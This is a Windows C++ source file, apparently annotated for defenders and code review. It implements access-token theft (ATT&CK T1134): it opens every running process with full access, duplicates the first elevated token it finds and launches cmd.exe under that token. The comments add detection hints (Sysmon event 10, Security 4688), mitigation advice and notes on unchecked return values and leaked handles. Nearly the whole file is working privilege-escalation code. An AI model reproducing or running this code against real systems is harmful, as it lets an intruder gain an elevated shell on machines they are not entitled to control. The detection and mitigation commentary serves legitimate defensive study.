main.cpp
#include <windows.h>
#include <tlhelp32.h>
using namespace std;
// Walks a snapshot of the running processes, duplicates the access token of
// the first process whose token reports TokenIsElevated, and asks
// CreateProcessWithTokenW to start cmd.exe under that duplicated token.
// This is the pattern MITRE ATT&CK tracks as T1134 (Access Token
// Manipulation): .001 token impersonation/theft, .002 create process with token.
//
// Defender notes:
//  - No privilege is enabled anywhere in this function, so every call depends
//    on rights the caller already holds. CreateProcessWithTokenW is documented
//    to require SE_IMPERSONATE_NAME in the caller; keeping that privilege (and
//    SeDebugPrivilege) off ordinary accounts is the primary mitigation.
//  - The loop requests PROCESS_ALL_ACCESS on every PID in the snapshot. One
//    process asking for full-access handles to many unrelated processes in a
//    short burst is a strong signal (e.g. Sysmon Event ID 10, GrantedAccess).
//  - A command shell created under a token borrowed from another process is
//    worth correlating with process-creation logging (Security 4688 / Sysmon 1).
//
// Returns FALSE (0) on the error paths and falls off the end otherwise, so the
// exit code does not distinguish success from failure.
// NOTE(review): process, newToken and duplicateNewToken are never passed to
// CloseHandle, and processListTool is closed only inside the catch blocks.
int main() {
HANDLE processListTool;
HANDLE process;
PROCESSENTRY32 pe32;
wchar_t cmdline[] = L"C:\\Windows\\system32\\cmd.exe";
HANDLE newToken = NULL;
HANDLE duplicateNewToken = NULL;
TOKEN_ELEVATION elevation;
BOOL privilege, ok = FALSE;
// Receives the number of bytes GetTokenInformation wrote into `elevation`;
// the value is not read afterwards.
DWORD dwSize;
// Snapshot of all processes on the system (the second argument is ignored
// for TH32CS_SNAPPROCESS).
processListTool = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
if (processListTool == INVALID_HANDLE_VALUE) {
// TODO: call GetLastError for details
// printf("You got an error while getting list of process");
return (FALSE);
};
// The Toolhelp API requires dwSize to be set to the structure size before
// Process32First is called; otherwise that call fails.
pe32.dwSize = sizeof(PROCESSENTRY32);
// Integer exceptions are used as error codes: 0 = Process32First failed,
// 2 = GetTokenInformation failed. Both are handled by catch (int) below.
try {
if (!Process32First(processListTool, &pe32)) {
throw 0;
}
do {
// Full-access open of each process in turn. Processes the caller is not
// allowed to open are skipped silently; `continue` in a do-while jumps to
// the Process32Next condition.
process = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pe32.th32ProcessID);
if (process == NULL) {
continue;
}
// NOTE(review): the BOOL stored in `ok` is never examined; the check below
// looks at newToken instead.
ok = OpenProcessToken(process, TOKEN_ALL_ACCESS, &newToken);
if (newToken == NULL) {
// printf("there is a problem with duplicating the token");
continue;
}
// Converts the opened token into a primary token, the kind a new process
// can be created with. The return value is not checked.
DuplicateTokenEx(newToken, TOKEN_ALL_ACCESS, NULL, SecurityImpersonation, TokenPrimary, &duplicateNewToken);
// Query whether the duplicated token is elevated; failure aborts the whole
// scan through the catch (int) handler rather than skipping this process.
if (!GetTokenInformation(duplicateNewToken, TokenElevation, &elevation, sizeof(elevation), &dwSize)) {
// printf("\nFailed to get Token Information");
throw 2;
}
privilege = elevation.TokenIsElevated;
if (privilege) {
// printf("found the token XD");
// First elevated token found: request cmd.exe under it and stop scanning.
// The result of the call is not checked.
CreateProcessWithTokenW(duplicateNewToken, LOGON_WITH_PROFILE, NULL, cmdline, 0, NULL, NULL,
NULL, NULL);
break;
}
// Comma operator: `privilege` is evaluated and discarded, only `ok` is set
// to FALSE. Both variables are reassigned before their next read.
privilege, ok = FALSE;
} while (Process32Next(processListTool, &pe32));
}
catch (int exceptionNum) {
// Error path for the integer codes thrown above: release the snapshot.
CloseHandle(processListTool);
if (exceptionNum == 0) {
// printf("Process32First");
}
return (FALSE);
}
catch (...) {
// Catch-all for any other C++ exception; the snapshot is released here too.
CloseHandle(processListTool);
// printf("on handled exception :)");
return (FALSE);
}
}